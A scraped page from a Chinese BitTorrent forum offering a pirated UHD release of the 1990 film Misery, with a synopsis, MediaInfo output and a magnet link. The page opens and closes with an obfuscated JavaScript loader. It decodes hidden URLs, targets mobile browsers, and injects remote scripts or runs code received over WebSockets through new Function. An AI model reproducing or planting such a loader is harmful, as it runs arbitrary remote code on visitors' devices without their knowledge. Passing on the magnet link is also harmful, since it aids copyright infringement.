危情十日[国英多音轨/简体字幕].Misery.1990.UHD.2160p.x265.10bit.HDR.3Audios.mUHD 21.44GB

版主小s 1月前 282

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 危情十日 / 苦难 / 米泽丽 / 米塞莉 / 战栗游戏 / 头号书迷

◎片 名 Misery

◎年 代 1990

◎产 地 美国

◎类 别 剧情 / 惊悚 / 犯罪

◎语 言 英语

◎上映日期 1990-11-30

◎IMDb链接 https://www.imdb.com/title/tt0100157/

◎豆瓣评分 8.4/10 (59451人评价)

◎豆瓣链接 https://movie.douban.com/subject/1292850/

◎片 长 107 分钟

◎导 演 罗伯·莱纳 Rob Reiner (id:1031903)

◎编 剧 威廉姆·高德曼 William Goldman (id:1022867)

斯蒂芬·金 Stephen King (id:1049547)

◎演 员 詹姆斯·肯恩 James Caan (id:1000050)

凯西·贝茨 Kathy Bates (id:1010555)

理查德·法恩斯沃斯 Richard Farnsworth (id:1049803)

弗朗西斯·斯特恩哈根 Frances Sternhagen (id:1148980)

J·T·沃尔什 J.T. Walsh (id:1055936)

格雷厄姆·贾维斯 Graham Jarvis (id:1050250)

劳伦·白考尔 Lauren Bacall (id:1049581)

罗伯·莱纳 Rob Reiner (id:1031903)

安德鲁·沙因曼 Andrew Scheinman (id:1276019)

马克·夏曼 Marc Shaiman (id:1027631)

罗伯特·利顿 Robert Leighton (id:1289761)

珍妮特·希尔森 Janet Hirshenson (id:1286699)

马克·W·曼斯布里奇 Mark W. Mansbridge (id:1290903)

加雷特·刘易斯 Garrett Lewis (id:1289951)

诺尔曼·加尔伍德 Norman Garwood (id:1284595)

格洛里亚·格雷斯汉 Gloria Gresham (id:1285438)

霍华德·伯杰 Howard Berger (id:1278442)

朱迪斯·A·科里 Judith A. Cory (id:1281330)

Margaret E. Elliott Margaret E. Elliott (id:1283123)

小约翰·M·艾略特 John M. Elliott Jr. (id:1283124)

Dennis Maguire Dennis Maguire (id:1290727)

Drew Ann Rosenberg Drew Ann Rosenberg (id:1296066)

◎标 签 惊悚 / 斯蒂芬·金 / 悬疑 / 美国 / 恐怖 / 犯罪 / 1990 / 美国电影

◎简 介

畅销书作家保罗?谢尔顿(詹姆斯?凯恩 James Caan 饰)带着他的最新作品《米瑟莉》驱车走在回家的路上。途中他遭遇了可怕的暴风雪,轿车发生侧翻事故,保罗的双腿严重受伤,幸好被独居在附近山顶的护士安妮?威尔克斯(凯西?贝茨 Kathy Bates 饰)及时相救。安妮是保罗的头号书迷,在她的悉心照顾下,保罗的伤势日渐好转。但当她获悉喜爱的女主人公在保罗的新书中已经死亡,却难以遏制心中的怒火,通过各种手段向保罗施加报复,逐渐将作家逼向了绝望……

影片根据恐怖小说大师斯蒂芬?金的同名小说改编,女主角凯西?贝茨凭借此片中的疯狂又反复无常的表演,成功斩获了第63届奥斯卡的最佳女演员奖。

◎获奖情况 (共1项)

第63届奥斯卡金像奖 (1991)

最佳女主角

└──凯西·贝茨 (id:1010555)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 33739723387948154947661656169299112746 (0x196208CBBD54AB443BEB07EF95B0F32A)

  4. Complete name : [email protected]OM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 21.4 GiB

  8. Duration : 1 h 47 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 28.6 Mb/s

  11. Encoded date : UTC 2021-10-23 13:15:21

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 1 h 47 min

  22. Bit rate : 24.0 Mb/s

  23. Width : 3 840 pixels

  24. Height : 2 160 pixels

  25. Display aspect ratio : 16:9

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.120

  32. Stream size : 18.0 GiB (84%)

  33. Writing library : x265 3.3+3-g8f8e332f1+29:[Windows][#Erg`Djh#][@Yuuki] made by @Dongfangbubai

  34. Encoding settings : rc=crf / crf=20.0000 / qcomp=0.70 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=-3 / crqpoffs=-3 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=3.00 / deblock=-1:-1 / ref=5 / limit-refs=0 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=23 / max-keyint=240 / rc-lookahead=60 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=32 / min-cu-size=8 / me=3 / subme=4 / merange=25 / rdoq-level=2 / rd=4 / rdpenalty=1 / dynamic-rd=0.00 / no-rd-refine / ----- / no-cutree / no-sao / no-rect / no-amp / no-open-gop / wpp / pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=2 / tu-intra-depth=2 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541176575 / frame-threads=6 / numa-pools=54,- / log-level=2 / input-csp=1 / input-res=3840x2160 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / repeat-headers / aud / hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=9 / transfer=16 / colormatrix=9 / chromaloc=0 / display-window=0 / master-display=G(13250,34500)B(7500,3000)R(34000,16000)WP(15635,16450)L(40000000,50) / cll=7130,545 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.01 / no-opt-cu-delta-qp / no-aq-motion / hdr10 / hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ=

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.2020

  39. Transfer characteristics : PQ

  40. Matrix coefficients : BT.2020 non-constant

  41. Mastering display color primaries : Display P3

  42. Mastering display luminance : min: 0.0050 cd/m2, max: 4000 cd/m2

  43. Maximum Content Light Level : 7130 cd/m2

  44. Maximum Frame-Average Light Level : 545 cd/m2


  45. Audio #1

  46. ID : 2

  47. Format : DTS XLL

  48. Format/Info : Digital Theater Systems

  49. Commercial name : DTS-HD Master Audio

  50. Codec ID : A_DTS

  51. Duration : 1 h 47 min

  52. Bit rate mode : Variable

  53. Bit rate : 3 647 kb/s

  54. Channel(s) : 6 channels

  55. Channel layout : C L R Ls Rs LFE

  56. Sampling rate : 48.0 kHz

  57. Frame rate : 93.750 FPS (512 SPF)

  58. Bit depth : 24 bits

  59. Compression mode : Lossless

  60. Stream size : 2.74 GiB (13%)

  61. Title : 英语

  62. Language : English

  63. Default : Yes

  64. Forced : No


  65. Audio #2

  66. ID : 3

  67. Format : AC-3

  68. Format/Info : Audio Coding 3

  69. Commercial name : Dolby Digital

  70. Codec ID : A_AC3

  71. Duration : 1 h 47 min

  72. Bit rate mode : Constant

  73. Bit rate : 640 kb/s

  74. Channel(s) : 6 channels

  75. Channel layout : L R C LFE Ls Rs

  76. Sampling rate : 48.0 kHz

  77. Frame rate : 31.250 FPS (1536 SPF)

  78. Compression mode : Lossy

  79. Stream size : 492 MiB (2%)

  80. Title : 德加拉国语

  81. Language : Chinese

  82. Service kind : Complete Main

  83. Default : No

  84. Forced : No


  85. Audio #3

  86. ID : 4

  87. Format : AC-3

  88. Format/Info : Audio Coding 3

  89. Commercial name : Dolby Digital

  90. Codec ID : A_AC3

  91. Duration : 1 h 47 min

  92. Bit rate mode : Constant

  93. Bit rate : 256 kb/s

  94. Channel(s) : 2 channels

  95. Channel layout : L R

  96. Sampling rate : 48.0 kHz

  97. Frame rate : 31.250 FPS (1536 SPF)

  98. Compression mode : Lossy

  99. Stream size : 197 MiB (1%)

  100. Title : 央视国语

  101. Language : Chinese

  102. Service kind : Complete Main

  103. Default : No

  104. Forced : No


  105. Text #1

  106. ID : 5

  107. ID in the original source medium : 4768 (0x12A0)

  108. Format : PGS

  109. Muxing mode : zlib

  110. Codec ID : S_HDMV/PGS

  111. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  112. Duration : 1 h 42 min

  113. Bit rate : 23.8 kb/s

  114. Count of elements : 1940

  115. Stream size : 17.4 MiB (0%)

  116. Title : 英文

  117. Language : English

  118. Default : Yes

  119. Forced : No

  120. Original source medium : Blu-ray


  121. Text #2

  122. ID : 6

  123. Format : PGS

  124. Muxing mode : zlib

  125. Codec ID : S_HDMV/PGS

  126. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  127. Duration : 1 h 43 min

  128. Bit rate : 22.5 kb/s

  129. Count of elements : 2308

  130. Stream size : 16.6 MiB (0%)

  131. Title : 德加拉简中

  132. Language : Chinese

  133. Default : No

  134. Forced : No


  135. Text #3

  136. ID : 7

  137. Format : PGS

  138. Muxing mode : zlib

  139. Codec ID : S_HDMV/PGS

  140. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  141. Duration : 1 h 42 min

  142. Bit rate : 22.4 kb/s

  143. Count of elements : 2255

  144. Stream size : 16.4 MiB (0%)

  145. Title : 央视简中

  146. Language : Chinese

  147. Default : No

  148. Forced : No


  149. Text #4

  150. ID : 8

  151. ID in the original source medium : 4771 (0x12A3)

  152. Format : PGS

  153. Muxing mode : zlib

  154. Codec ID : S_HDMV/PGS

  155. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  156. Duration : 1 h 45 min

  157. Bit rate : 72.3 kb/s

  158. Count of elements : 2725

  159. Stream size : 54.4 MiB (0%)

  160. Title : 双语

  161. Language : Chinese

  162. Default : No

  163. Forced : No

  164. Original source medium : Blu-ray


  165. Menu

  166. 00:00:00.000 : en:Chapter 01

  167. 00:07:03.256 : en:Chapter 02

  168. 00:19:05.978 : en:Chapter 03

  169. 00:32:16.268 : en:Chapter 04

  170. 00:41:27.318 : en:Chapter 05

  171. 00:49:52.781 : en:Chapter 06

  172. 00:57:20.062 : en:Chapter 07

  173. 01:05:06.778 : en:Chapter 08

  174. 01:11:26.073 : en:Chapter 09

  175. 01:23:05.731 : en:Chapter 10

  176. 01:36:10.723 : en:Chapter 11

  177. 01:44:14.832 : en:Chapter 12

  178. 01:47:23.437 : en:Chapter 13


TAGS 剧情 惊悚 犯罪

磁力链:
  • magnet:?xt=urn:btih:D5EF2AF1027E29725A9A16BEB2F8C2653EE0D3A3

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};